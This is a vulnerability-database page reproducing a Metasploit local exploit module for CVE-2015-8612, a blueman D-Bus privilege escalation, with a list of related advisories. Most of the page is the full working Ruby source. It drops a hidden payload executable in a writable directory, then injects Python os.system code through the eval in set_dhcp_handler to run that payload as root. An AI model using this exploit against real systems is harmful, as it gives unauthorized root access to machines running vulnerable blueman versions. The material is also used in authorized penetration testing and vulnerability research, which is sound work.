Lucene search
K

blueman set_dhcp_handler D-Bus Privilege Escalation

🗓️ 16 Jan 2019 00:00:00Reported by The GrugqType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 60 Views

blueman D-Bus Privilege Escalation in blueman versions prior to 2.0.3, allowing arbitrary code execution as roo

Related
Code
ReporterTitlePublishedViews
Family
0day.today
blueman - set_dhcp_handler D-Bus Privilege Escalation Exploit
17 Jan 201900:00
zdt
ArchLinux
blueman: privilege escalation
25 Jan 201600:00
archlinux
Circl
CVE-2015-8612
16 Jan 201900:00
circl
CNVD
Blueman Remote Privilege Vulnerability
31 Dec 201500:00
cnvd
CVE
CVE-2015-8612
8 Jan 201619:00
cve
Cvelist
CVE-2015-8612
8 Jan 201619:00
cvelist
Debian CVE
CVE-2015-8612
8 Jan 201619:00
debiancve
Tenable Nessus
Debian DSA-3427-1 : blueman - security update
21 Dec 201500:00
nessus
Tenable Nessus
Slackware 13.37 / 14.0 / 14.1 / current : blueman (SSA:2015-356-01)
29 Dec 201500:00
nessus
Exploit DB
blueman - set_dhcp_handler D-Bus Privilege Escalation (Metasploit)
16 Jan 201900:00
exploitdb
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = ExcellentRanking  
  
include Msf::Post::File  
include Msf::Post::Linux::Priv  
include Msf::Post::Linux::System  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'blueman set_dhcp_handler D-Bus Privilege Escalation',  
'Description' => %q{  
This module attempts to gain root privileges by exploiting a Python  
code injection vulnerability in blueman versions prior to 2.0.3.  
  
The `org.blueman.Mechanism.EnableNetwork` D-Bus interface exposes the  
`set_dhcp_handler` function which uses user input in a call to `eval`,  
without sanitization, resulting in arbitrary code execution as root.  
  
This module has been tested successfully with blueman version 1.23  
on Debian 8 Jessie (x64).  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'the grugq', # Discovery and exploit  
'bcoles' # Metasploit  
],  
'DisclosureDate' => '2015-12-18',  
'References' =>  
[  
['BID', '79688'],  
['CVE', '2015-8612'],  
['URL', 'https://twitter.com/thegrugq/status/677809527882813440'],  
['URL', 'https://github.com/blueman-project/blueman/issues/416'],  
['URL', 'https://www.openwall.com/lists/oss-security/2015/12/18/6'],  
['URL', 'https://www.debian.org/security/2015/dsa-3427'],  
['URL', 'https://bugs.mageia.org/show_bug.cgi?id=17361'],  
['URL', 'http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.421085']  
],  
'Platform' => ['linux'],  
'Arch' =>  
[  
ARCH_X86,  
ARCH_X64,  
ARCH_ARMLE,  
ARCH_AARCH64,  
ARCH_PPC,  
ARCH_MIPSLE,  
ARCH_MIPSBE  
],  
'SessionTypes' => ['shell', 'meterpreter'],  
'Targets' => [['Auto', {}]],  
'DefaultTarget' => 0))  
register_advanced_options [  
OptBool.new('ForceExploit', [false, 'Override check result', false]),  
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])  
]  
end  
  
def base_dir  
datastore['WritableDir'].to_s  
end  
  
def upload(path, data)  
print_status "Writing '#{path}' (#{data.size} bytes) ..."  
rm_f path  
write_file path, data  
register_file_for_cleanup path  
end  
  
def upload_and_chmodx(path, data)  
upload path, data  
chmod path  
end  
  
def dbus_send(dest:, type:, path:, interface:, contents:)  
cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}"  
end  
  
def check  
unless command_exists? 'dbus-send'  
vprint_error 'dbus-send is not installed. Exploitation will fail.'  
return CheckCode::Safe  
end  
vprint_good 'dbus-send is installed'  
  
res = dbus_send(  
dest: 'org.blueman.Mechanism',  
type: 'method_call',  
path: '/',  
interface: 'org.freedesktop.DBus.Introspectable.Introspect',  
contents: ''  
)  
  
unless res.include? 'EnableNetwork'  
vprint_error 'org.blueman.Mechanism.EnableNetwork D-Bus interface is not available'  
return CheckCode::Safe  
end  
vprint_good 'org.blueman.Mechanism.EnableNetwork D-Bus interface is available'  
  
res = execute_python('')  
unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)'  
vprint_error 'Target is not vulnerable'  
return CheckCode::Safe  
end  
  
CheckCode::Vulnerable  
end  
  
def execute_python(code)  
dbus_send(  
dest: 'org.blueman.Mechanism',  
type: 'method_call',  
path: '/',  
interface: 'org.blueman.Mechanism.EnableNetwork',  
contents: "'string:[]' 'string:[]' 'string:#{code}'"  
)  
end  
  
def exploit  
unless check == CheckCode::Vulnerable  
unless datastore['ForceExploit']  
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'  
end  
print_warning 'Target does not appear to be vulnerable'  
end  
  
if is_root?  
unless datastore['ForceExploit']  
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'  
end  
end  
  
unless writable? base_dir  
fail_with Failure::BadConfig, "#{base_dir} is not writable"  
end  
  
payload_name = ".#{rand_text_alphanumeric 10..15}"  
payload_path = "#{base_dir}/#{payload_name}"  
upload_and_chmodx payload_path, generate_payload_exe  
  
print_status 'Executing payload...'  
res = execute_python "os.system(\"#{payload_path}&\")"  
vprint_line res  
  
unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)'  
fail_with Failure::NotVulnerable, 'The target is not vulnerable'  
end  
  
if res.include? 'SyntaxError:'  
fail_with Failure::Unknown, 'Payload execution failed due to syntax error'  
end  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation